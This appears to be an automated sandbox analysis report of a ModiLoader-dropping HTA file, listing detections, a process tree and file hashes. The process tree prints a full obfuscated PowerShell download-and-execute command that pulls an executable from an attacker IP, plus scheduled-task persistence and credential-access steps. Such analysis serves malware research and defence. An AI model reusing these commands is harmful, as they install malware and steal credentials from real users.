Analysis
-
max time kernel
148s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
01/04/2025, 15:19
Static task
static1
Behavioral task
behavioral1
Sample
creatingbestthingsforbetterfuture.hta
Resource
win10v2004-20250314-en
General
-
Target
creatingbestthingsforbetterfuture.hta
-
Size
13KB
-
MD5
d784a93b62ff236f0090d49eee225f61
-
SHA1
18545dbd755b169d693a42c7e0ab32f4fd81aeaf
-
SHA256
5774db473258bf744264a3a02e01931fa02ecd19a26f0f9329bfa5ac89d08512
-
SHA512
3ca6164390caddbfe14bb3b50e690c08bd5e4df827b4a24e642b759c63cb375cf54ed9f3c9e9bd76c13075f149637034cee64039c9230bc100ba3016c42e73f0
-
SSDEEP
48:3StrVotriVRy1K+rUmn514Szy6oFAConovTboMrt2tgVJtSPG:AgrYmN514SyJF1onovTbDEGS+
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/5412-79-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-82-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-90-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-100-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-117-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-142-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-140-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-138-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-137-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-136-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-135-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-134-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-133-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-132-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-130-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-128-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-126-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-125-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-123-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-121-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-120-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-116-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-139-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-113-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-112-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-111-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-110-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-109-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-108-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-107-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-131-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-129-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-106-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-105-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-127-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-104-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-103-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-124-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-122-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-102-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-101-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-119-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-118-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-99-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-115-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-98-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-114-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-97-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-96-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-95-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-94-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-93-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-92-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-83-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-91-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-89-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-88-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-87-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-86-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-84-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 behavioral1/memory/5412-85-0x0000000002910000-0x0000000003910000-memory.dmp modiloader_stage2 -
Blocklisted process makes network request 1 IoCs
flow pid Process 23 5912 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 23 5912 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 5472 cmd.exe 5912 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Control Panel\International\Geo\Nation rundll32.exe -
Executes dropped EXE 5 IoCs
pid Process 5412 sihost.exe 4172 alpha.pif 5788 alpha.pif 4040 Djauszke.PIF 1884 Djauszke.PIF -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts recover.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 5412 set thread context of 4060 5412 sihost.exe 121 PID 5412 set thread context of 4412 5412 sihost.exe 122 PID 5412 set thread context of 3324 5412 sihost.exe 123 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 5328 4040 WerFault.exe 116 4704 1884 WerFault.exe 133 -
System Location Discovery: System Language Discovery 1 TTPs 18 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alpha.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Djauszke.PIF Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sihost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Djauszke.PIF Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language recover.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5920 PING.EXE -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5920 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 464 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 5912 powershell.exe 5912 powershell.exe 4060 recover.exe 4060 recover.exe 3324 recover.exe 3324 recover.exe 4060 recover.exe 4060 recover.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 5412 sihost.exe 5412 sihost.exe 5412 sihost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5912 powershell.exe Token: SeDebugPrivilege 3324 recover.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5412 sihost.exe -
Suspicious use of WriteProcessMemory 57 IoCs
description pid Process procid_target PID 1184 wrote to memory of 5472 1184 mshta.exe 87 PID 1184 wrote to memory of 5472 1184 mshta.exe 87 PID 1184 wrote to memory of 5472 1184 mshta.exe 87 PID 5472 wrote to memory of 5912 5472 cmd.exe 90 PID 5472 wrote to memory of 5912 5472 cmd.exe 90 PID 5472 wrote to memory of 5912 5472 cmd.exe 90 PID 5912 wrote to memory of 4904 5912 powershell.exe 96 PID 5912 wrote to memory of 4904 5912 powershell.exe 96 PID 5912 wrote to memory of 4904 5912 powershell.exe 96 PID 4904 wrote to memory of 4308 4904 csc.exe 97 PID 4904 wrote to memory of 4308 4904 csc.exe 97 PID 4904 wrote to memory of 4308 4904 csc.exe 97 PID 5912 wrote to memory of 5412 5912 powershell.exe 101 PID 5912 wrote to memory of 5412 5912 powershell.exe 101 PID 5912 wrote to memory of 5412 5912 powershell.exe 101 PID 5412 wrote to memory of 5200 5412 sihost.exe 102 PID 5412 wrote to memory of 5200 5412 sihost.exe 102 PID 5412 wrote to memory of 5200 5412 sihost.exe 102 PID 5412 wrote to memory of 3452 5412 sihost.exe 103 PID 5412 wrote to memory of 3452 5412 sihost.exe 103 PID 5412 wrote to memory of 3452 5412 sihost.exe 103 PID 5200 wrote to memory of 4256 5200 cmd.exe 106 PID 5200 wrote to memory of 4256 5200 cmd.exe 106 PID 5200 wrote to memory of 4256 5200 cmd.exe 106 PID 3452 wrote to memory of 5920 3452 cmd.exe 107 PID 3452 wrote to memory of 5920 3452 cmd.exe 107 PID 3452 wrote to memory of 5920 3452 cmd.exe 107 PID 5200 wrote to memory of 4172 5200 cmd.exe 108 PID 5200 wrote to memory of 4172 5200 cmd.exe 108 PID 5200 wrote to memory of 4172 5200 cmd.exe 108 PID 5200 wrote to memory of 5788 5200 cmd.exe 109 PID 5200 wrote to memory of 5788 5200 cmd.exe 109 PID 5200 wrote to memory of 5788 5200 cmd.exe 109 PID 5412 wrote to memory of 4336 5412 sihost.exe 110 PID 5412 wrote to memory of 4336 5412 sihost.exe 110 PID 5412 wrote to memory of 4336 5412 sihost.exe 110 PID 4336 wrote to memory of 464 4336 cmd.exe 113 PID 4336 wrote to memory of 464 4336 cmd.exe 113 PID 4336 wrote to memory of 464 4336 cmd.exe 113 PID 1292 wrote to memory of 4040 1292 rundll32.exe 116 PID 1292 wrote to memory of 4040 1292 rundll32.exe 116 PID 1292 wrote to memory of 4040 1292 rundll32.exe 116 PID 5412 wrote to memory of 4060 5412 sihost.exe 121 PID 5412 wrote to memory of 4060 5412 sihost.exe 121 PID 5412 wrote to memory of 4060 5412 sihost.exe 121 PID 5412 wrote to memory of 4060 5412 sihost.exe 121 PID 5412 wrote to memory of 4412 5412 sihost.exe 122 PID 5412 wrote to memory of 4412 5412 sihost.exe 122 PID 5412 wrote to memory of 4412 5412 sihost.exe 122 PID 5412 wrote to memory of 4412 5412 sihost.exe 122 PID 5412 wrote to memory of 3324 5412 sihost.exe 123 PID 5412 wrote to memory of 3324 5412 sihost.exe 123 PID 5412 wrote to memory of 3324 5412 sihost.exe 123 PID 5412 wrote to memory of 3324 5412 sihost.exe 123 PID 5980 wrote to memory of 1884 5980 rundll32.exe 133 PID 5980 wrote to memory of 1884 5980 rundll32.exe 133 PID 5980 wrote to memory of 1884 5980 rundll32.exe 133
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\creatingbestthingsforbetterfuture.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C poWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepoWershell.exe -eX ByPASs -NONi -w 1 -C DeVIcecredentialDePLOYMeNt ; Iex($(iEX('[sYSTem.teXt.ENcoDinG]'+[CHAr]0x3a+[chAR]0x3a+'uTF8.gETStRInG([systeM.cOnvert]'+[CHAR]58+[ChAR]0X3a+'frOMBaSE64STRiNg('+[CHAr]0X22+'JHNSTjd5MEwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNQkVSZGVGaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqa2JvZFpGVm1CLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6ZE5FTlRESCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV0ksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjR2EsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEF4a3RXTyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiR0VNaXhyIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNUbmV5WlllQ1RpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHNSTjd5MEw6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjE5MS44OC85MC9zaWhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U1RBclQtU0xFZXAoMyk7aW5WT2tFLUl0ZU0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzaWhvc3QuZXhlIg=='+[ChAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\aw5cq0fe\aw5cq0fe.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES70BB.tmp" "c:\Users\Admin\AppData\Local\Temp\aw5cq0fe\CSCAEF37203D2584819B593FBAC3246696.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:4308
-
-
-
C:\Users\Admin\AppData\Roaming\sihost.exe"C:\Users\Admin\AppData\Roaming\sihost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5412 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\1859.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Windows\SysWOW64\esentutl.exeC:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o6⤵PID:4256
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Users\Public\alpha.pifC:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\39457.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3452 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 106⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5920
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\\ProgramData\\81.cmd5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Djauszke" /tr C:\\ProgramData\\Djauszke.url"6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:464
-
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\iskdvgtuccshfbzowzmcgqormolsaptsve"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4060
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\smqwwz"5⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:4412
-
-
C:\Windows\SysWOW64\recover.exeC:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\uovgxropdt"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3324
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292 -
C:\Users\Admin\Links\Djauszke.PIF"C:\Users\Admin\Links\Djauszke.PIF"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4040 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 12763⤵
- Program crash
PID:5328
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4040 -ip 40401⤵PID:5072
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Windows\System32\ieframe.dll",OpenURL C:\\ProgramData\\Djauszke.url1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5980 -
C:\Users\Admin\Links\Djauszke.PIF"C:\Users\Admin\Links\Djauszke.PIF"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1884 -s 11123⤵
- Program crash
PID:4704
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 364 -p 1884 -ip 18841⤵PID:1284
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD51df650cca01129127d30063634ab5c03
SHA1bc7172dec0b12b05f2247bd5e17751eb33474d4e
SHA256edd4094e7a82a6ff8be65d6b075e9513bd15a6b74f8032b5c10ce18f7191fa60
SHA5120bddf9ecaaedb0c30103a1fbfb644d6d4f7608bd596403307ed89b2390568c3a29e2cf55d10e2eadbfc407ede52eaf9a4f2321ba5f37e358a1039f73c7688fbd
-
Filesize
2KB
MD59a020804eba1ffac2928d7c795144bbf
SHA161fdc4135afdc99e106912aeafeac9c8a967becc
SHA256a86c6c7a2bf9e12c45275a5e7ebebd5e6d2ba302fe0a12600b7c9fdf283d9e63
SHA51242f6d754f1bdbeb6e4cc7aeb57ff4c4d126944f950d260a0839911e576ad16002c16122f81c1d39fa529432dca0a48c9acfbb18804ca9044425c8e424a5518be
-
Filesize
83B
MD540dcdc4a568ca38fd76ed517d58895dd
SHA1a61427cc65116b4f452c75d8270d5316aa52087f
SHA2565337e647cbe97c1108b0c690bccf5327291051fd0b80a7c51a8f06ca4c32b987
SHA5122e32e0bec4ec95af7f1d5fa7a26e69d00a0d50afedeefeb50a809eb52a44d9c00036ccaaf47773035e21925fcc0425a3726d5676013189d0845a31c93dfa0cb1
-
Filesize
99B
MD5a5912988334a6c35fe2ec953f58ce524
SHA16948136050973d827eed0327e58fc134d669a081
SHA256fe37e36e0ead8740d562edcab4c2157d530feb3bc736743421d77706552fdf0f
SHA512b569029ae32c7276d4a8e6ca055c40132858ddd5607f3d61fd695253d93a6fb13275f9308a24e9c9dbf09ad2ea386e426089f36e0127b21fd9c6b14a7825d480
-
Filesize
102B
MD55dc76b14f6c80491954c744e47119360
SHA19fd1e95bc06a9f19a1ad9fcb5f8fa272c8013e66
SHA25658397582ee17680b2f4d10f5c8245c8e36f99deb0a11c17b1359d02093cc7550
SHA51210d27351c6cb77ec93f96ecaeadfea2b3341cfdc5e6904a5e86e69f2d1dbb9753ba994e5dfab0001b2de396e44e27961b698c43306f01ad5fc8fe67463467f5f
-
Filesize
1KB
MD507e3511f495b713d432dd83ff5967816
SHA15c24755ed85cc5ce62802eaa39aa719d79d4c05a
SHA2565ca722b31603f9d7ead841cee06339f4678274d04c8c548a81e234cfc33f6226
SHA5123b0c16bdef3bbfb5fe05ab10683dded6b60fbc9d5569ca4e5e07102fb2ffc17a36b1d229eee306e5b3a58d5c98526987a8bef992f8a708744cee0b6ae2b2b245
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD52e408cb2400e4e64fc86bed25443526d
SHA10330d029475c8e34c9b21fa9cf0be42c92a3deeb
SHA2567270089019a3e2b8ca6bd5cc73908ed5d7e542eab4feb35e1a6a82aa27d5e7a7
SHA5125e2c770a8d48c94424b90c5fca97828c2da6430f7397399e2c09a1bc380d94e2eeeb7007de658448cb442801e2a191192ad467f19090107194c82c039817a6b1
-
Filesize
4KB
MD505a640e15ef8a6cd5d8db4633bfd2df3
SHA123771918cb286dd2ca98c0cc1664931e64cc33c8
SHA2565b8be3e1fe8438ab1032b5914b5f5b8f544defc91213c6ef3f307b44d2a1951c
SHA51227d198ecea0bbc12a48ce27c8dbd8a9a445248956623cefd501562cf00162a662e40f020a7276f1f870f324617f419342de9384b71664eea4778866b8bcfd616
-
Filesize
1.6MB
MD5d245c0efade78fbe55c9d537732dc8fb
SHA1339657894338cfa9ee994e440443d4fc7ef75368
SHA256860bb4fd3607ebdb177d9732653f9baeff86192cdf7874c5824ab37b9b61013d
SHA512562e31c22abf83d57785a5506025847e18a652765f4086ebc1c199b751eeb184a85e9d0ec08289fea1b6beeda0b94e2195a46702aa643ba4f3558a4023af2268
-
Filesize
231KB
MD5d0fce3afa6aa1d58ce9fa336cc2b675b
SHA14048488de6ba4bfef9edf103755519f1f762668f
SHA2564d89fc34d5f0f9babd022271c585a9477bf41e834e46b991deaa0530fdb25e22
